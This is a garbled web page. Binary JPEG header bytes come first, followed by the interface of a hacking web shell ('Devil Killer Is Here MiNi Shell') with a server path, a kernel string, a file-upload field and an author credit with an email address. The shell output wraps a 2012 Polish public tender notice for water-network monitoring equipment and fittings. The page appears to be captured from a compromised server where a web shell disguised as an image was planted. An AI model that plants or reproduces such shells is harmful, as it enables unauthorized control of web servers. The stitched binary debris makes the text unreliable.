JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121119/457822-N-2012.html

<p class="kh_header"><b>Sobótka: Sukcesywna DOSTAWA I URUCHOMIENIE URZĄDZEŃ DO systemu monitoringu PARAMETRÓW PRACY SIECI WODOCIĄGOWEJ  oraz, armatury wodociągowej i sanitarnej - z podziałem na II części</b><br>
<b>Numer ogłoszenia: 457822 - 2012; data zamieszczenia: 19.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej i Mieszkaniowej "Ślęża" , ul. Czysta 7, 55-050 Sobótka, woj. dolnośląskie, tel. 0-71 316 22 86, faks 0-71 316 22 93.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zwiksobotka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zakład budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna DOSTAWA I URUCHOMIENIE URZĄDZEŃ DO systemu monitoringu PARAMETRÓW PRACY SIECI WODOCIĄGOWEJ  oraz, armatury wodociągowej i sanitarnej - z podziałem na II części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia opis techniczny zgodnie z załącznikiem nr 1 do specyfikacji.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających, o których mowa w Art. 67 ust. 1 pkt 6</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.41.00.00-2, 38.42.11.00-3, 38.42.11.10-6, 44.16.00.00-9, 42.13.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia do wykonywania zamówienia tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonał minimum dwie dostawy na zakup sprzętu specjalistycznego, w zakresie dostawy i instalacji systemu do monitorowania pracy sieci wodociągowej w zakresie pomiaru ciśnienia i przepływu, obejmującego minimum 4 punkty pomiarowe o całkowitej wartości wykonanej dostawy równej minimum 100 tys. zł (netto) dotyczy części I zamówienia oraz dostaw rur i osprzętu armatury sanitarnej i wodociągowej o wartości minimum 100 tyś zł (netto) dotyczy części II zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. posiadanie polisy lub innego dokumentu ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony w zakresie odpowiedzialności cywilnej na kwotę nie mniejszą niż 150 tys. zł (PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Świadectwo homologacji CE (tłumaczenie w języku polskim)
 Deklaracje zgodności
Wymagany Atest PZH</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty (poprawienie omyłki pisarskiej, omyłki rachunkowej). Wszelkie zmiany wymagają zgody obu stron i formy pisemnej w postaci aneksu pod rygorem nieważności.
Warunki zmiany:

błędy pisarskie w treści umowy;
gdy ulegną zmianie przepisy prawne istotne dla realizacji przedmiotu umowy,
ograniczenia zakresu prac objętych niniejszą umową w przypadku stwierdzenia braku konieczności wykonania części zamówienia objętego przetargiem,
zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści umowy, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
zmiana podwykonawcy oraz zakresu realizacji zamówienia przez podwykonawcę;
zmiana wynagrodzenia brutto w przypadku urzędowej zmiany stawki podatku VAT;
w przypadku braku środków na realizację zadania lub wystąpienia innych nie przewidzianych przyczyn Zamawiający dopuszcza możliwość przesunięcia w formie aneksu do umowy ostatecznego terminu realizacji przedmiotu umowy.
Jeżeli występują zmiany w strukturze organizacyjnej Zamawiającego lub Wykonawcy, dotyczące określonych w umowie nazw, adresów, podległości, rachunków bankowych oraz wykazu osób uprawnionych. Strony niezwłocznie informują pisemnie o tych zmianach. Zmiany takie nie wymagają formy pisemnej w postaci aneksu.

1. Zmiana niniejszej umowy wymaga sporządzenia aneksu w formie pisemnej pod rygorem  nieważności.
2. Strony ustalają, iż zmiany treści niniejszej umowy są dopuszczalne w sytuacji, gdy:
    a) wystąpi błąd pisarski w treści umowy,
    b) ulegną zmianie  przepisy prawne istotne dla wykonania umowy,
    c) zostanie stwierdzony brak konieczności wykonania części zamówienia objętego przetargiem - zmiana umowy będzie polegać na ograniczeniu zakresu prac objętych niniejszą umową,
    d) wystąpi konieczność wprowadzenia zmiany postanowień niniejszej umowy, wynikająca z okoliczności, których niemożna było przewidzieć w chwili zawarcia umowy,
    e) nastąpi zmiana podwykonawcy oraz zakresu realizacji zamówienia przez podwykonawcę,
    f) Zamawiającemu zabraknie środków pieniężnych niezbędnych dla wykonania umowy  lub wystąpią inne przyczyny, których nie można było wcześniej przewidzieć, w tym problemy natury technicznej niezależne od żadnej ze stron, jeżeli ich rodzaj lub zakres uniemożliwiają lub istotnie utrudniają dotrzymanie pierwotnego terminu umownego - strony mogą przesunąć ostateczny termin realizacji przedmiotu umowy.
3. Nie wymagają sporządzenia aneksu następujące zmiany treści niniejszej umowy:
    a) zmiana kwoty brutto składającej się na wynagrodzenia Wykonawcy, określone w § 3 ust. 1, w wyniku ustawowej zmiany stawki podatku VAT,
    b) jeżeli występują zmiany w strukturze organizacyjnej Zamawiającego lub Wykonawcy, dotyczące określonych w umowie nazw, adresów, podległości, rachunków bankowych oraz wykazu osób uprawnionych.
4. W sytuacji, o której mowa w ust. 3, strony niezwłocznie informują pisemnie o zaistniałych zmianach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zgkimsobotka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.zgkimsobotka.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2012 godzina 09:30, miejsce: siedzibie ZGKiM w Sobótce, ul. Czysta7, w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚC I Sukcesywna DOSTAWA I URUCHOMIENIE URZĄDZEŃ DO systemu monitoringu PARAMETRÓW PRACY SIECI WODOCIĄGOWEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rejestrator do pomiaru ciśnienia i rejestracji przepływu (1 kanał ciśnienia i 2 kanały przepływu) 
 z wbudowanym modemem GSM SMSGPRS do transmisji danych i czujnikiem ciśnienia. 



Modem GPRSSMS do obioru sygnału z 11 rejestratorów na sieci z podłączeniem do komputera.
W zestawie: antena, kabel połączeniowy do komputera, program instalacyjny
Program komputerowy do obróbki danych przesyłanych z 11 rejestratorów drogą GPRSSMS 
Szkolenie w zakresie obsługi programu komputerowego oraz montażu rejestratorów na sieci (2 przyjazdy 2 szkolenia po 8 h)
Zestaw komputerowy z monitorem 19, systemem operacyjnym Windows 8:
Obudowa LC-POWER Pro-925B USB 3.0 ATX bez zasilacza P yta ASUS P8B75-V B75SATA3USB3PCIe3.0s.1155ATX
PROC INTEL Pentium G860 3.0GHz2x256KB L2/3MB s.1155BOX CORSAIR DDR3 8GB (2x4GB)1600MHz 9-9-9-24 Vengeance 1,5V Dual Zasilacz TRACER Highlander 450W Silent 12cm ATX BOX  kab.
Dysk SEAGATE ST500DM002 500GB 7200 16MB SATA III NCQ DVD RW LG GH24NS95RBBB black bulk SATA (bez soft) VGA Gigabyte GT430 1GB DDR3 128b VGA+DVI+HDMI PCI-E SP1 OEM 64Bit POLISH 1-pack


Rejestrator przepływu i ciśnienia
Dwa kanały przepływu (impuls 0.001, 0.01, 0.1, 1, 10 m3h)
Wbudowany przetwornik ciśnienia zakres 0 - 100 m H2O (0 - 200 m H2O OPCJA)
Wbudowana antena, (zewnętrzna opcjonalnie)
Wbudowane źródło zasilania (bateria) o żywotności min 5 lat
Wbudowany modem GSM
Transmisja danych GSM/SMSGPRS
Częstotliwość rejestracji od 1s do 1h
Częstotliwość transmisji danych min, co 1h
Całość systemu IP68
Programowalne zdalnie profilowane progi alarmowe po 2 dla każdego kanału (niski, wysoki)
Obudowa z tworzywa sztucznego
Wbudowana pamięć wewnętrzna
Wymagania dotyczące oprogramowania
Współpraca z wszystkimi zainstalowanymi na sieci rejestratorami i sterownikami
Możliwość łączenia w sieć wewnętrzną poszczególnych stanowisk 5 szt. 
Przekazywanie danych z rejestratorów bezpośrednio na serwer lub komputer użytkownika
Graficzna oraz liczbowa analiza danych parametrów chwilowych
Odczyty stanów wodomierza oraz automatyczne obliczanie zużycia między odczytami,
Obliczanie przepływów maksymalnych, minimalnych, średnio dobowych i sumarycznych
Obliczanie przepływów objętościowych w dowolnych przedziałach czasowych
Porównywanie dobowych charakterystyk przepływów blokowanie linii wzorcowego przepływu i porównywanie ich do analogicznych z różnych okresów
Możliwość zmiany jednostek
Możliwość zdalnego programowania alarmów rejestratorów w dowolnym czasie,
Możliwość automatycznego tworzenia sumarycznych wykresów z dowolnej ilości rejestratorów/ suma kilku przepływów, obliczanie przepływów w strefach/
Możliwość jednoczesnego porównania wykresów z dowolnej ilości rejestratorów
Dodatkowe oprogramowanie do prawidłowego doboru wodomierza
Zabezpieczenie programu kluczem
Możliwość wizualizacji sieci wodociągowej w oknie programu



lp.Przepływomierze elektromagnetyczne i wodomierze
Przepływomierz elektromagnetyczny DN150 zasilany bateryjnie (pomiar dwukierunkowy). Wersja rozdzielna. W pakiecie zewnętrzny moduł bateryjny. 
Przepływomierz elektromagnetyczny DN80 w wersji kompakt (przetwornik montowany bezpośrednio na czujniku). Zasilanie elektryczne z zewnątrz - Dławiki: 
Wodomierz kołnierzowy DN100 jednostrumieniowy klasy pomiarowej C z nakładką impulsową typ I (wyjściem impulsowym wyposażonym w kompensacje wstecznego przepływu). 
Wodomierz kołnierzowy DN80 jednostrumieniowy klasy pomiarowej C z nakładką impulsową typ I (wyjściem impulsowym wyposażonym w kompensacje wstecznego przepływu). 		
Wodomierz kołnierzowy DN50 jednostrumieniowy klasy pomiarowej C z nakładką impulsową typ I (wyjściem impulsowym wyposażonym w kompensacje wstecznego przepływu).
Wersja rozłączna z kablem o długości 10 m
Długość zabudowy zgodna z ISO 13359
Atest PZH, zgodność z PED
Dane techniczne czujnika pomiarowego:
średnica nominalna: DN 150 (DN 80) (DN 100) w zależności
ciśnienie nominalne: PN 16
zakres prędkości: 0,1...10 m/s
zakres przepływów: max. 629m3/h
przyłącze procesowe: kołnierzowe wg EN 1092-1 (DIN 2501)
wykładzina: EPDM (twarda guma)
materiał elektrod pomiarowych i uziemiającej: hastelloy C276
detekcja pustego rurociągu
czujnik przewężony o jedną średnicę pod kątem 7°
materiał korpusu i kołnierzy: stal węglowa AISI304, malowany proszkowo powłoką poliestrową
stopień ochrony: czujnik pomiarowy P 68 - konstrukcja odporna na zalanie, możliwość zakopania w ziemi; przetwornik IP67 (IP68 z żelem uszczelniającym FDK: 085U0220)
temperatura medium: 0...+70°C

Dane techniczne przetwornika pomiarowego:
zasilanie: bateryjne 2 baterie (trwałość baterii minimum 6 lat - w zależności od częstotliwości pomiaru)
montaż rozłączny: kabel połączeniowy dł. 10m
dokładność 0,4% (+- 2 mms) przepływu chwilowego
z wyświetlaczem 8 cyfrowym i klawiaturą obsługową
funkcje: 2 liczniki, pomiar przepływu chwilowego, czas i data, alarmy, monitorowanie
zasilania, rejestry pamięci danych, automatyczne zapamiętywanie licznika, pomiar przepływów zwrotnych,
zegar czasu rzeczywistego
funkcje samodiagnostyki i beck up danych
detekcja pustego rurociągu
wyjścia impulsowe: 2 szt. pasywne typu otwarty kolektor, programowane, w obu kierunkach
komunikacja cyfrowa IrDA - Modus RTU
wbudowany rejestrator danych z programowalnym interwałem min.26 miesięcy
parametryzacja i monitorowanie danych: oprogramowanie PC Flow Tool, (poprzez IrDA)
 temperatura pracy: -20...+60°C
Instrukcja obsługi w jęz. polskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.41.00.00-2, 38.42.11.00-3, 38.42.11.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II armatury wodociągowej i sanitarnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> armatura sanitarna, elementy prefabrykowane studzienek, rury i kształtki pe do wody,armatura wodociągowa, zgodnie z zestawieniem w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.16.00.00-9, 42.13.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com